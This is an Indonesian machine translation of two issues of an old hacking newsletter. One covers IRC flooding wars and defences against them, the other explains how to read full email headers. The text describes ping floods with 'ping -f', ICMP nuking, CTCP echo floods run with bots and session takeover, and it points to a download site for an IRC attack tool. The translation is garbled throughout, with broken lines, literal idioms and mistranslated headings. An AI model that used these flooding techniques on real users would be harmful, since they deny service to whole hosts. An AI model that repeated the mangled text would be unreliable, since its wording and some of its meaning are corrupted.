PANDUAN UNTUK (kebanyakan) HACKING HARMLESS
Vol. 3 Angka 3
Bagaimana agar tidak diusir dari IRC!
____________________________________________________________
Terima kasih kami kepada Patrick Rutledge, Warbeast, Meltdown, dan k1neTiK, yang semuanya memberikan informasi berharga
pada pertanyaan yang membara dari dunia IRC: tolong, mereka nuking meee ...
Apa masalah besar tentang IRC dan peretas? Sheesh, IRC sangat mudah digunakan ... sampai Anda masuk ke server
tempat perang hacker berkuasa. Apa yang Anda lakukan agar tidak terus-menerus musnah?
Tentu saja Anda bisa saja memutuskan musuh Anda bisa pergi ke neraka. Tapi katakanlah Anda lebih suka bertahan di sana.
Kamu
mungkin ingin bertahan di sana karena jika Anda ingin berteman cepat di dunia hacker, salah satu yang terbaik
caranya adalah melalui Internet Relay Chat (IRC).
Di IRC, sekelompok orang mengetik pesan bolak-balik di layar dalam waktu yang hampir bersamaan. Itu bisa lebih
menyenangkan
daripada Usenet yang membutuhkan waktu beberapa menit hingga beberapa jam agar balasan orang muncul. Dan tidak seperti
Usenet, jika
Anda mengatakan sesuatu yang Anda sesali, itu segera hilang dari layar. Ahem. Artinya, itu akan segera hilang jika tidak ada
seorang pun
sedang mencatat sesi.
Dalam beberapa hal, IRC seperti radio CB, dengan banyak orang menyala dan membodohi diri sendiri dengan cara yang unik
cara menjengkelkan. Jadi jangan berharap untuk melihat kebijaksanaan abadi dan gulir ke bawah layar komputer Anda. Tapi
karena IRC adalah cara yang tidak mahal bagi orang-orang dari seluruh dunia untuk bertukar ide dengan cepat, benar
banyak digunakan oleh peretas. Juga, mengingat perang yang dapat Anda perjuangkan untuk mengontrol saluran IRC, itu bisa
memberi Anda
latihan hacker yang bagus.

Halaman 168
Untuk mendapatkan IRC Anda memerlukan program klien IRC dan Anda harus terhubung ke situs Web atau Internet
Penyedia Layanan (ISP) yang menjalankan program server IRC.
*************************
Catatan pemula: Program apa pun yang menggunakan sumber daya disebut “klien.” Program apa pun yang menawarkan sumber
daya adalah a
"Server." Program klien IRC Anda berjalan di komputer di rumah atau di komputer akun shell dan
menghubungkan Anda ke program server IRC yang berjalan pada komputer jarak jauh di suatu tempat di Internet.
*************************
Anda mungkin sudah memiliki server IRC yang berjalan di ISP Anda. Layanan pelanggan di ISP Anda harus bisa
membantu Anda dengan petunjuk tentang cara menggunakannya. Lebih mudah lagi, jika browser Web Anda diatur untuk
menggunakan Java, Anda
dapat menjalankan IRC langsung dari browser Anda setelah Anda berselancar ke server IRC berbasis Web.
Di mana server IRC yang baik untuk bertemu dengan peretas lain?
Ada beberapa server IRC yang biasanya menawarkan saluran hacker. EFNet (Jaringan Eris-Free) menghubungkan banyak IRC
server. Awalnya dimulai oleh Eris FreeNet (ef.net). Itu dianggap sebagai "medan perang" di mana Anda
mungkin mendapatkan kesempatan untuk benar-benar mempraktekkan teknik IRC yang kami bahas di bawah ini.
Undernet adalah salah satu jaringan server IRC terbesar. Tujuan utama dari Undernet adalah menjadi ramah
tempat dengan perang IRC di bawah kendali. Tapi ini berarti, ya, banyak polisi IRC! Operator server IRC ini
memiliki izin untuk membunuh Anda tidak hanya dari saluran tetapi juga dari server. Heck, mereka bisa melarang Anda untuk
selamanya.
Mereka bahkan dapat mencekal seluruh domain Anda.
**********************************
Catatan pemula: Domain adalah dua (atau terkadang tiga atau empat) bagian terakhir dari alamat email Anda. Sebagai contoh,
aol.com adalah nama domain untuk America Online. Jika jaringan IRC melarang domain aol.com, itu
akan berarti setiap orang di America Online akan dilarang melakukannya.
**********************************
**********************************
Anda dapat dipukul dalam peringatan hidung: Jika sysadmin di ISP Anda mengetahui bahwa Anda memilikinya
berhasil membuat seluruh domain mereka diblokir dari jaringan IRC karena melakukan pengeboman ICMP atau
apa pun, mereka akan benar-benar marah padamu! Anda akan beruntung jika yang terburuk terjadi adalah Anda kehilangan uang
Anda
rekening. Anda sebaiknya berharap bahwa kata tidak keluar untuk semua pecandu IRC di ISP Anda bahwa Anda adalah
Bung yang membuat kalian semua diusir.
**********************************
IRCNet mungkin berukuran sama jika tidak lebih besar dari Undernet. IRCNet pada dasarnya adalah Eropa / Australia
berpisah dari EFNet lama.
Ya, IRC adalah fenomena di seluruh dunia. Dapatkan di jaringan IRC yang tepat dan Anda dapat berteman
peretas di benua mana pun di planet ini. Setidaknya ada 80 jaringan IRC yang ada. Untuk mempelajari caranya
hubungi mereka, telusuri ke: http://www.irchelp.org/. Anda dapat menemukan server IRC tambahan dengan menjelajahi
http://hotbot.com atau http://digital.altavista.com dan mencari "server IRC." Beberapa server IRC ideal
untuk peretas elit, misalnya server l0pht. Perhatikan bahwa "nol" bukan "O" dalam l0pht.
**************************************
Tip jenius jahat: Dapatkan di server IRC dengan telneting langsung melalui port 6667 di nama domain untuk itu
server.
**************************************

Halaman 169
Tetapi sebelum Anda terlalu bersemangat mencoba IRC, izinkan kami memperingatkan Anda. IRC tidak begitu banyak phun lagi
karena beberapa d00dz tidak puas menggunakannya hanya untuk mengatakan kata-kata nakal dan melemparkan aspirasi
leluhur orang dan kebiasaan merawat. Mereka mendapatkan tawa mereka dengan mengusir orang lain sepenuhnya dari IRC. Ini
karena mereka terlalu ayam untuk memulai perkelahian di bar. Jadi mereka memukuli orang-orang di dunia maya tempat mereka
tidak perlu khawatir mendapatkan ouchies.
Tapi kami akan menunjukkan beberapa cara sederhana dan efektif untuk menjaga lintah ini dari merusak sesi IRC Anda.
Namun, pertama-tama Anda harus mengetahui beberapa cara Anda bisa dikeluarkan dari IRC oleh pengganggu ini.
Cara paling sederhana untuk mendapat masalah adalah secara tidak sengaja memberikan kendali atas saluran IRC Anda kepada
penipu yang
tujuannya adalah untuk menendang Anda dan teman Anda.
Soalnya, orang pertama yang memulai saluran pada server IRC secara otomatis adalah operator (OP). Itu
operator memiliki kekuatan untuk mengusir orang atau mengundang orang masuk. Juga, jika operator menginginkannya, ia dapat
melakukannya
meneruskan status operator ke orang lain.
Idealnya, ketika Anda meninggalkan saluran, Anda akan meneruskan status ini kepada teman yang Anda percayai. Mungkin juga
seseorang yang menurut Anda adalah teman baik Anda, mohon tolong, tolong beri dia giliran menjadi
operator. Anda dapat memutuskan untuk menyerahkan OP kepadanya untuk menunjukkan persahabatan. Tetapi jika Anda
mengacau dan secara tidak sengaja OP orang jahat yang berpura-pura menjadi seseorang yang Anda kenal dan percayai, obrolan
menyenangkan Anda
bisa menjadi sejarah.
Salah satu cara untuk menjaga agar semua hal menjengkelkan ini tidak terjadi adalah dengan tidak OP orang yang tidak Anda
kenal.
Tapi ini lebih mudah diucapkan daripada dilakukan. Merupakan hal yang ramah untuk memberikan OP kepada teman-teman
Anda. Anda mungkin tidak mau
tampak macet dengan menolak OP siapapun. Jadi, jika Anda akan OP teman, bagaimana Anda bisa mengatakan itu
Bung IRC adalah temanmu?
Hanya karena Anda mengenali nama panggilan (nickname), jangan menganggap siapa yang Anda pikirkan! Periksa tuan rumah
alamat yang terkait dengan nick dengan memberikan perintah "/ whois IRCnick" di mana "IRCnick" adalah nama panggilan
dari orang yang ingin Anda periksa.
Perintah "/ whois" ini akan memberi Anda alamat email milik orang yang menggunakan nick itu. Jika
Anda melihat, misalnya, “d***@wannabe.net” alih-alih alamat yang Anda harapkan, katakanlah friend@cool.com,
maka JANGAN OP dia. Buat orang tersebut menjelaskan siapa dia dan mengapa alamat emailnya berbeda.
Tetapi memasukkan nick palsu ketika memasuki server IRC hanyalah cara paling sederhana yang dapat disabotase oleh
seseorang
Sesi IRC. Masalah Anda yang sebenarnya muncul ketika orang-orang menyebarkan "nuklir" dan "ICBM" terhadap Anda.
"Nuking" juga dikenal sebagai "Pemboman ICMP." Ini termasuk pesan palsu seperti EOF (akhir file),
soket mati, redirect, dll.
************************************
Catatan pemula: ICMP adalah singkatan dari Internet Control Message Protocol. Ini adalah kelas serangan IRC yang masuk
melampaui mengeksploitasi kebiasaan dalam program server IRC untuk mengambil keuntungan dari teknik peretasan liga utama
berdasarkan cara Internet bekerja.
************************************
************************************
Anda dapat masuk ke penjara peringatan: serangan ICMP merupakan serangan penolakan layanan secara ilegal. Mereka tidak
adil
pelecehan yang tidak berbahaya terhadap satu orang di IRC, tetapi dapat memengaruhi seluruh komputer host Internet, berselisih
layanan untuk semua yang menggunakannya.
***************************************

Halaman 170
Misalnya, pesan pengalihan ICMP digunakan oleh router untuk memberi tahu komputer lain “Hei, berhentilah mengirim saya itu
barang. Kirim saja ke routerx.foobar.net! ”Jadi pesan pengalihan ICMP dapat menyebabkan pesan IRC Anda
untuk pergi ke surga bukan saluran obrolan Anda.
EOF adalah singkatan dari “end of file.” “Dead socket” mengacu pada koneksi seperti sesi PPP yang Anda inginkan
dapat digunakan dengan banyak klien IRC untuk terhubung ke Internet. Jika musuh IRC Anda memalsukan pesan bahwa Anda
soket sudah mati, sesi obrolan IRC Anda tidak bisa mendapatkan input lagi dari Anda. Itulah yang disebut program “ICMP
Host Unreachable Bomber for Windows ”tidak.
Mungkin senjata IRC yang paling dahsyat adalah ping flood, yang dikenal sebagai “ICBM flood or ICMPing.” Idenya
adalah bahwa seorang pengganggu akan mencari tahu host Internet apa yang Anda gunakan, dan kemudian memberikan perintah
"ping-f" kepada Anda
komputer host. Atau bahkan ke komputer di rumah Anda. Ya, di IRC dimungkinkan untuk mengidentifikasi secara dinamis
ditugaskan alamat IP komputer di rumah Anda dan mengirim barang langsung ke modem Anda! Jika pengganggu memiliki yang
layak
komputer, ia mungkin bisa melakukan ping ke Anda cukup buruk untuk secara singkat menjatuhkan Anda dari IRC. Lalu ini
karakter dapat mengambil alih sesi IRC Anda dan dapat menyamar seperti Anda.
**********************
Catatan pemula: Ketika Anda terhubung ke Internet dengan koneksi point-to-point (PPP), host ISP Anda
komputer memberi Anda alamat Internet Protocol (IP) yang mungkin berbeda setiap kali Anda masuk. Ini
disebut "alamat IP yang ditetapkan secara dinamis." Namun dalam beberapa kasus, ISP telah mengatur untuk menetapkan
menggunakan alamat IP yang sama setiap kali.
**********************
Sekarang mari kita pertimbangkan secara lebih rinci berbagai jenis serangan banjir di IRC.
Tujuan dari flooding adalah untuk mengirim begitu banyak sampah ke klien yang koneksinya ke server IRC
menjadi tidak berguna atau terputus.
Text flooding adalah serangan paling sederhana. Misalnya, Anda bisa menahan tombol "x" dan menekan enter dari
waktu demi waktu. Ini akan membuat layar IRC terisi dengan sampah Anda dan gulir komentar orang lain dengan cepat
dari layar. Namun, teks flooding hampir selalu tidak berhasil karena hampir semua klien IRC (the
program yang Anda jalankan di komputer Anda) memiliki kontrol banjir teks. Bahkan jika tidak, teks harus melewati IRC
server. Sebagian besar server IRC juga memiliki filter banjir teks.
Karena banjir teks pada dasarnya tidak berbahaya, Anda tidak mungkin menderita hal yang lebih buruk daripada diblokir
atau mungkin K: siap melakukannya.
****************************************
Catatan pemula: "K: line" berarti melarang tidak hanya Anda, tetapi siapa pun yang ada di domain Anda dari server IRC. Untuk
contoh, jika Anda seorang mahasiswa di Giant State University dengan alamat email IRCd00d@giantstate.edu,
maka setiap orang yang alamat emailnya diakhiri dengan "giantstate.edu" juga akan dicekal.
*******************************************
Client to Client Protocol (CTCP) floo echo adalah jenis banjir yang paling efektif. Ini semacam seperti
ping yang Anda kirim untuk menentukan apakah komputer host masih hidup. Ini adalah perintah yang digunakan dalam IRC
untuk memeriksa
lihat apakah seseorang masih di saluran IRC Anda.
Bagaimana cara kerja perintah gema? Untuk memeriksa apakah seseorang masih di saluran IRC Anda, berikan
perintah "/ ctcp nick ECHO halo di luar sana!" Jika "nick" (di mana "nick" adalah nama panggilan IRC dari orang yang Anda
sedang memeriksa) masih ada di sana, Anda kembali "nick HELLO OUT THERE."
Apa yang terjadi adalah program klien IRC korban Anda secara otomatis menggemakan pesan apa pun
kamu mengirim.

Halaman 171
Tetapi seseorang yang ingin mem-boot Anda dari IRC dapat menggunakan perintah echo CTCP untuk mengelabui server IRC
Anda
berpikir Anda memonopoli saluran dengan terlalu banyak bicara. Ini karena sebagian besar server IRC akan melakukannya
secara otomatis memotong Anda jika Anda mencoba flooding teks.
Jadi, banjir gema CTCP menipu IRC untuk secara salah memotong seseorang dengan menyebabkan klien IRC korban
untuk secara otomatis terus menanggapi sejumlah permintaan gema.
Tentu saja penyerang Anda juga bisa di-boot karena membuat semua permintaan gema CTCP. Tapi a
penyerang berpengetahuan baik akan bekerja di liga dengan beberapa teman yang akan melakukan hal yang sama
Anda atau terhubung dengan beberapa torehan berbeda ke server IRC yang sama. Jadi dengan memiliki yang berbeda
versi dirinya dalam bentuk perangkat lunak bot membuat permintaan gema CTCP, penyerang tetap
aktif saat korban di-boot off.
Serangan ini juga cukup tidak berbahaya, jadi orang yang ketahuan melakukan ini hanya akan diblokir atau mungkin
K: berbaris karena kelakuan buruk mereka.
******************************
Catatan pemula: "Bot" adalah program komputer yang bertindak seperti robot untuk berkeliling dan melakukan banyak hal
kamu. Beberapa bot sulit diceritakan dari orang sungguhan. Misalnya, beberapa bot IRC menunggu seseorang untuk
menggunakan yang buruk
bahasa dan menanggapi kata-kata nakal ini dengan cara yang menjengkelkan.
*************************************
*************************************
Anda bisa dipukul di peringatan hidung: Bot tidak diizinkan di server jaringan besar. Itu
IRC Polisi yang mengontrol perang hacker di jaringan ini tidak lebih dari membunuh bot dan melarangnya
botrunners yang mereka tangkap.
************************************
Serangan serupa adalah CATCH ping. Anda dapat memberikan perintah “/ ping nick” dan klien IRC dari pria tersebut
menggunakan nick itu akan merespons ke server IRC dengan pesan untuk diteruskan ke orang yang membuat
permintaan ping mengatakan "nick" masih hidup, dan memberi tahu Anda berapa lama yang dibutuhkan untuk program klien
IRC nick
menanggapi. Ini berguna untuk mengetahui waktu tanggapan karena kadang-kadang Internet bisa sangat lambat
sepuluh detik atau lebih untuk mengirim pesan IRC ke orang lain di saluran IRC itu. Jadi, jika seseorang tampaknya
butuh waktu lama untuk membalas Anda, mungkin itu hanya internet yang lambat.
Penyerang Anda juga dapat dengan mudah mendapatkan alamat IP (protokol Internet) yang ditetapkan secara dinamis di rumah
Anda
komputer dan langsung membanjiri modem Anda. Tetapi hampir setiap program IRC Unix memiliki setidaknya beberapa
CATCH
perlindungan banjir di dalamnya. Sekali lagi, kami melihat jenis serangan yang tidak berbahaya.
Jadi bagaimana Anda menangani serangan IRC? Ada beberapa program yang dapat Anda jalankan dengan IRC Unix Anda
program. Contohnya adalah program LiCe dan Phoenix. Script ini akan berjalan di latar belakang Anda
Unix sesi IRC dan secara otomatis akan menendang dalam semacam perlindungan (abaikan, larangan, tendang) terhadap
penyerang.
Jika Anda menjalankan klien IRC berbasis Windows, Anda dapat menganggap bahwa seperti biasa Anda kurang beruntung.
Faktanya,
ketika saya pertama kali masuk ke saluran IRC baru-baru ini menggunakan Netscape 3.01 berjalan pada Win 95, * pertama * hal
itu
penghuni #hackers lakukan adalah mengolok-olok sistem operasi saya. Ya terima kasih. Tapi sebenarnya ada IRC yang bagus
program perang untuk Windows 95 dan Unix.
Untuk Windows 95 Anda mungkin ingin menggunakan program klien mIRC. Anda dapat mengunduhnya dari
http://www.super-highway.net/users/govil/mirc40.html. Ini termasuk perlindungan dari banjir ping ICMP. Tapi
program ini tidak cukup untuk menangani semua perang IRC yang mungkin Anda temui. Jadi, Anda mungkin ingin
menambahkan
perlindungan skrip perang Windows 95 yang paling user-friendly dan kuat di sekitar: 7th Sphere. Kamu bisa mendapatkannya
dari http://www.localnet.com/~marcraz/.

Halaman 172
Jika Anda menjelajahi IRC dari kotak Unix, Anda ingin mencoba IRCII. Anda dapat mengunduhnya dari ftp.undernet.org, di
direktori / pub / irc / klien / unix, atau http://www.irchelp.org/, atau ftp: // cs -ftp.bu.edu/irc/. Untuk ditambahkan
perlindungan, Anda dapat mengunduh LiCe dari ftp://ftp.cibola.net/pub/irc/scripts. Ahem, di situs yang sama ini Anda bisa
juga unduh program serangan Centang dari / pub / irc / tick. Tetapi jika Anda mendapatkan Tick, ingatlah kami “Anda bisa
dipukul di hidung ”peringatan!
*********************************
Catatan pemula: Untuk instruksi terperinci tentang cara menjalankan program IRC ini, lihat
Di http://www.irchelp.org/. Atau buka Usenet dan periksa alt.irc.questions
*********************************
*********************************
Kiat jenius jahat: Ingin tahu setiap detail teknis yang menyiksa tentang IRC? Lihat RFC 1459 (IRC
protokol). Anda dapat menemukan banyak salinan RFC (Permintaan Komentar) yang populer ini dengan melakukan Web
pencarian.
********************************
Sekarang anggaplah Anda semua sudah diatur dengan program klien IRC kekuatan industri dan skrip perang. Apakah
ini berarti Anda siap berperang melawan IRC?
Kami orang Happy Hacker tidak merekomendasikan menyerang orang yang mengambil alih status OP secara paksa di IRC.
Bahkan
jika orang lain memulainya, ingat ini. Jika mereka bisa menyelinap ke saluran dan mendapatkan OP begitu saja,
maka kemungkinan mereka jauh lebih berpengalaman dan berbahaya daripada Anda. Sampai Anda menjadi IRC
Kuasai dirimu sendiri, kami sarankan Anda melakukan tidak lebih dari meminta OP dengan sopan kembali.
Lebih baik lagi, "/ abaikan nick" the l00zer dan bergabunglah dengan saluran lain. Misalnya, jika #evilhaxorchat diambil alih,
cukup buat # evilhaxorchat2 dan "/ undang IRCfriend" semua teman Anda di sana. Dan ingat untuk menggunakan apa yang Anda
pelajari dalam Panduan ini tentang perintah whois IRC sehingga Anda TIDAK MEMBUKA orang kecuali Anda tahu siapa
mereka.
Seperti yang dikatakan Patrick Rutledge, ini mungkin terdengar seperti langkah yang lemah, tetapi jika Anda tidak memiliki
kesempatan untuk bertarung, jangan lakukan
coba - mungkin akan lebih memalukan bagi Anda dalam jangka panjang. Dan jika Anda memulai IRC warrioring dan
mendapatkan K: berbaris
dari sistem, hanya berpikir tentang hidung ungu dan mata hitam yang bisa Anda dapatkan ketika semua dudes IRC lainnya
di ISP atau sekolah Anda, cari tahu siapa luser yang membuat semua orang dilarang.
Itu saja untuk sekarang. Sekarang jangan mencoba hal-hal lucu, oke? Oh, tidak, mereka nuking meee ...
____________________________________________________________
___________________________________________________________
PANDUAN UNTUK (kebanyakan) HACKING HARMLESS
Vol 3 Nomor 4
Cara Membaca Header Email dan Menemukan Host Internet
Peringatan: flamebait terlampir!
____________________________________________________________
OK, OK, kamu 31337 haxor menang. Saya akhirnya merilis seri berikutnya dari Panduan yang berorientasi pada
hacker menengah.

Halaman 173
Sekarang beberapa dari Anda mungkin berpikir bahwa header terlalu sederhana atau membosankan untuk menghabiskan waktu.
Namun, beberapa minggu
lalu saya bertanya kepada 3000+ pembaca daftar Happy Hacker apakah ada yang bisa memberi tahu saya apa sebenarnya trik
email saya
bermain dalam proses mengirimkan Intisari. Tetapi tidak satu orang menjawab dengan jawaban lengkap - atau
bahkan 75% jawaban - atau bahkan curiga bahwa selama berbulan-bulan hampir semua surat selamat Hacker miliki
berlipat ganda sebagai protes. Sasaran: ISP yang menawarkan situs unduhan untuk program pembom email. Kesimpulan: itu
saatnya untuk berbicara tajuk!
Dalam Panduan ini kita akan belajar:
· Apa itu tajuk
· Mengapa tajuk menyenangkan
· Cara melihat header lengkap
· Apa arti semua hal dalam header Anda
· Cara mendapatkan nama komputer host Internet dari header Anda
· Dasar untuk memahami penempaan email dan pos Usenet, menangkap orang-orang yang memalsukan
header, dan teori di balik program-program bomber email yang dapat membawa seluruh Layanan Internet
Penyedia (ISP) bertekuk lutut
Ini adalah Panduan yang dapat Anda gunakan setidaknya tanpa akun shell atau memasang beberapa bentuk
Unix di komputer di rumah Anda. Yang Anda butuhkan hanyalah mengirim dan menerima email, dan Anda sedang berbisnis.
Namun, jika Anda memiliki akun shell, Anda dapat melakukan lebih banyak lagi dengan menguraikan header. Viva Unix!
Judul mungkin terdengar seperti topik yang membosankan. Heck, program email Eudora bernama tombol yang Anda klik untuk
membaca
tajuk penuh "blah blah blah." Tetapi semua orang yang memberi tahu Anda tajuk itu membosankan, tidak tahu - atau yang lain
takut Anda akan membuka peti yang indah penuh dengan wawasan peretas. Ya, setiap tajuk email yang Anda periksa memiliki
berpotensi untuk menggali harta karun yang tersembunyi di lorong belakang Internet.
Sekarang tajuk mungkin tampak cukup sederhana untuk menjadi topik bagi salah satu Panduan Seri Pemula kami. Tapi saat aku
pergi untuk mencari topik header di perpustakaan manual saya, saya terkejut menemukan bahwa kebanyakan dari mereka tidak
bahkan membahas topik tersebut. Kedua saya menemukan bahwa header penutup tidak mengatakan apa-apa tentang mereka.
Bahkan
RFC 822 yang relevan cukup samar. Jika ada di antara kalian pembaca yang sangat waspada yang mencari umpan api kebetulan
tahu
dari literatur apa pun * yang * membahas header secara detail, harap sertakan informasi itu dalam omelan Anda!
*******************************************
Kiat teknis: Informasi yang relevan dengan tajuk dapat diekstraksi dari Requests for Comments (RFCs) 822
(terbaik), serta 1042, 1123, 1521, dan 1891 (bukan daftar lengkap). Untuk membacanya, bawa browser Web Anda ke
http://altavista.digital.com dan cari “RFC 822” dll.
*******************************************
Tidak banyak bantuan dari manual, dan menemukan bahwa RFC 822 tidak menjawab semua pertanyaan saya, cara utama saya
meneliti artikel ini adalah untuk mengirim email bolak-balik di antara beberapa akun saya, mencoba banyak
variasi untuk melihat jenis header apa yang mereka hasilkan. Hei, begitulah seharusnya peretas sebenarnya
mengetahui hal-hal ketika RTFM (baca manual bagus) atau RTFRFC (baca RFC bagus) tidak memberi tahu kami sebanyak
seperti yang ingin kita ketahui. Kanan?
Satu hal terakhir. Orang-orang menunjukkan kepada saya bahwa setiap kali saya memasukkan alamat email atau nama domain di
a
Panduan untuk (kebanyakan) Peretasan Tidak Berbahaya, satu juta pemula meluncurkan serangan peretasan yang gagal terhadap
ini. Semua
alamat email dan nama domain di bawah ini telah diubur.
**********************************************
Catatan pemula: Kata kerja "to fubar" berarti mengaburkan alamat email dan alamat host Internet
mengubahnya. Tradisi kuno menyatakan bahwa yang terbaik adalah dengan mengganti "foobar" atau "fubar" untuk bagian dari
alamat.
**********************************************

Halaman 174
Apa itu Pemimpin?
Jika Anda baru mengenal peretasan, tajuk yang biasa Anda lihat mungkin tidak lengkap. Kemungkinannya adalah kapan
Anda mendapatkan email itu terlihat seperti ini:
Dari: Vegbar Fubar <fooha@ifi.foobar.no>
Tanggal: Jum, 11 Apr 1997 18:09:53 GMT
Kepada: hacker@techbroker.com
Tetapi jika Anda tahu perintah yang benar, tiba-tiba, dengan pesan email yang sama ini, kami sedang melihat ton dan
banyak barang:
Diterima: oleh o200.fooway.net (950413.SGI.8.6.12 / 951211.SGI)
untuk techbr@fooway.net id OAA07210; Jumat, 11 Apr 1997 14:10:06 -0400
Diterima: dari ifi.foobar.no oleh o200.fooway.net via ESMTP (950413.SGI.8.6.12 / 951211.SGI)
untuk <hacker@techbroker.com> id OAA18967; Jumat, 11 Apr 1997 14:09:58 -0400
Diterima: dari gyllir.ifi.foobar.no (2234@gyllir.ifi.foobar.no [129.xxx.64.230]) oleh ifi.foobar.no dengan ESMTP
(8.6.11 / ifi2.4)
id <UAA24351@ifi.foobar.no> untuk <hacker@techbroker.com>; Jumat, 11 Apr 1997 20:09:56 +200
Dari: Vegbar Fubar <fooha@ifi.foobar.no>
Diterima: dari localhost (Vegbarha @ localhost) oleh gyllir.ifi.foobar.no; Jumat, 11 Apr 1997 18:09:53 GMT
Tanggal: Jum, 11 Apr 1997 18:09:53 GMT
Message-Id: <199704111809.13156.gyllir@ifi.foobar.no>
Kepada: hacker@techbroker.com
Hei, pernahkah Anda bertanya-tanya mengapa semua itu ada di sana dan apa artinya? Kami akan kembali ke contoh ini nanti
dalam tutorial ini. Tetapi pertama-tama kita harus mempertimbangkan pertanyaan yang membara saat ini:
MENGAPA HEADERS FUN?
Mengapa repot-repot dengan header "bla bla bla" itu? Mereka membosankan, bukan? Salah!
1) Pernah mendengar seorang hacker wannabe mengeluh dia tidak memiliki alamat komputer yang bagus
jelajahi? Apakah Anda pernah menggunakan salah satu program pemindai IP yang menemukan alamat Protokol Internet yang
valid
host Internet untuk Anda? Nah, Anda dapat menemukan gazillions alamat yang valid tanpa kruk salah satunya
program hanya dengan membaca tajuk email.
2) Pernah bertanya-tanya siapa yang benar-benar mengirimkan spam "Hasilkan Uang Cepat"? Atau siapa klutz yang dibom email
itu
kamu? Langkah pertama untuk mempelajari cara menemukan pemalsuan email dan mengenali pelakunya adalah dengan
membaca header.
3) Ingin mempelajari cara memalsukan email secara meyakinkan? Apakah Anda bercita-cita untuk menulis spam otomatis atau
pembom email
program? (Saya tidak setuju dengan program spammer dan bom email, tapi mari kita jujur tentang jenisnya
pengetahuan yang harus diambil oleh pencipta mereka.) Langkah pertama adalah memahami tajuk.
4) Ingin menyerang komputer seseorang? Cari tahu tempat terbaik untuk menyerang dari tajuk email mereka. saya
menyetujui penggunaan ini juga. Tapi saya berdedikasi untuk memberi tahu Anda kebenaran tentang acking, jadi suka atau tidak,
ini dia
aku s.
BAGAIMANA ANDA BISA MELIHAT KEPALA PENUH?
Jadi, Anda melihat tajuk email Anda dan tampaknya tidak memiliki barang bagus apa pun. Ingin
melihat semua hal yang tersembunyi? Cara Anda melakukannya tergantung pada program email apa yang Anda gunakan.

Halaman 175
Program email paling populer saat ini adalah Eudora. Untuk melihat tajuk lengkap di Eudora, cukup klik "blah, blah,
tombol bla ”di ujung kiri bilah alat.
Browser web Netscape termasuk pembaca email. Untuk melihat tajuk lengkap, klik Opsi, lalu klik
Item "Tampilkan Semua Header".
Maaf, saya belum melihat bagaimana melakukannya dengan Internet Explorer. Oh, tidak, aku bisa melihat nyala api datang,
bagaimana
berani saya tidak belajar seluk beluk surat IE! Tapi, serius, IE adalah browser Web yang berbahaya dan tidak aman
karena itu sebenarnya adalah shell Windows. Jadi tidak peduli seberapa sering Microsoft memperbaiki kekurangan keamanannya,
kemungkinan Anda akan terluka olehnya suatu hari ini. Katakan saja "tidak" ke IE.
Program email populer lainnya adalah Pegasus. Mungkin ada cara mudah untuk melihat header penuh di Pegasus, tapi saya
belum menemukannya. Cara sulit untuk melihat tajuk lengkap di Pegasus - atau IE - atau program email apa pun - adalah
membuka
folder email Anda dengan Wordpad. Ini termasuk dalam sistem operasi Windows 95 dan merupakan yang terbaik
Program pengeditan Windows yang saya temukan untuk menangani dokumen dengan banyak karakter kontrol tertanam
dan keanehan lainnya.
Program email Compuserve 3.01 secara otomatis menampilkan tajuk lengkap. Bravo, Compuserve!
Pine adalah program email paling populer yang digunakan dengan akun shell Unix. Karena untuk menjadi peretas sejati Anda
cepat atau lambat akan menggunakan Unix, sekarang mungkin saat yang tepat untuk mulai menggunakan Pine.
***********************************************
Catatan untuk pemula: Pine adalah kepanjangan dari Pine Is Not Elm, sebuah penghargaan untuk program email Elm yang benar-
benar kuno (yaitu
masih digunakan). Baik Pine dan Elm berasal dari ARPAnet, Badan Proyek Penelitian Lanjutan Pertahanan AS
jaringan komputer yang akhirnya bermutasi menjadi Internet saat ini. OKE, OKE, itu lelucon. Menurut
uraian resmi, “PINE adalah Program University of Washington untuk Berita Internet dan
E-mail'."
***********************************************
Jika Anda belum pernah menggunakan Pine sebelumnya, Anda mungkin merasa tidak semudah menggunakan email Windows
yang mewah itu
program. Tapi selain dari kekuatannya yang luar biasa, ada alasan yang sangat bagus untuk belajar menulis email di Pine:
Anda berlatih menggunakan perintah pico editor. Jika Anda ingin menjadi peretas sejati, Anda akan menggunakan pico
editor (atau editor lain yang menggunakan perintah serupa) suatu hari ketika Anda menulis program di Unix
kulit.
Untuk memunculkan Pine, pada kursor di shell Unix Anda cukup ketik "pine."
Di Pine, saat melihat pesan email, Anda mungkin dapat melihat header lengkap dengan hanya menekan tombol "h". Jika
ini tidak berfungsi, Anda harus masuk ke menu Pengaturan untuk mengaktifkan perintah ini. Untuk melakukan ini, buka
menu utama dan berikan perintah "s" untuk Setup. Kemudian di menu Pengaturan pilih "c" untuk Config. Di
Halaman kedua dari menu Config Anda akan melihat sesuatu seperti ini:
PINE 3.91 KONFIGURASI PENGATURAN Folder: Pesan INBOX 2
[] compose-rejects-unqualified-addrs
[] menulis-set-newsgroup-tanpa-konfirmasi
[] delete-skips-delete
[] aktifkan -aggregate-command-set
[] aktifkan -alternate-editor-cmd
[] aktifkan -alternate-editor-secara implisit
[] aktifkan -bounce-cmd
[] aktifkan -flag-cmd
[X] aktifkan-header-penuh-cmd

Halaman 176
[] aktifkan -incoming-folder
[] aktifkan -jump-pintasan
[] aktifkan -mail-check-isyarat
[] aktifkan-tunda
[] aktifkan -tab-completion
[] aktifkan -unix-pipe-cmd
[] diperluas-lihat-alamat-buku alamat
[] diperluas-lihat-folder
[] hapus tanpa konfirmasi
[] termasuk-lampiran-dalam-balasan
? Bantuan E Keluar Config P Sebelumnya - PrevPage
X [Set / Unset] N Next Spc NextPage W WhereIs
Anda pertama-tama menyoroti garis yang mengatakan "enable-full-header-command" dan kemudian tekan tombol "x". Memberi
"e"
untuk keluar menyimpan perubahan. Setelah Anda selesai melakukannya, saat Anda membaca email, Anda akan dapat
melihatnya
header penuh dengan memberikan perintah "h".
Elm adalah program membaca email Unix lainnya. Ini sebenarnya memberikan header yang sedikit lebih rinci daripada Pine, dan
secara otomatis menampilkan tajuk lengkap.
APA YANG DIMAKSUD DENGAN SEMUA MANUSIA YANG DIMAKSUD DENGAN KEPALA ANDA?
Kami akan mulai dengan melihat tajuk lengkap yang agak menarik. Lalu kita akan memeriksa dua header yang mengungkapkan
beberapa kejahatan yang menarik. Akhirnya kita akan melihat tajuk yang dipalsukan.
OK, mari kita kembali ke tajuk lengkap yang cukup biasa yang kita lihat di atas. Kami akan menguraikannya sepotong demi
sepotong.
Pertama kita melihat versi sederhana:
Dari: Vegbar Fubar <fooha@ifi.foobar.no>
Tanggal: Jum, 11 Apr 1997 18:09:53 GMT
Kepada: hacker@techbroker.com
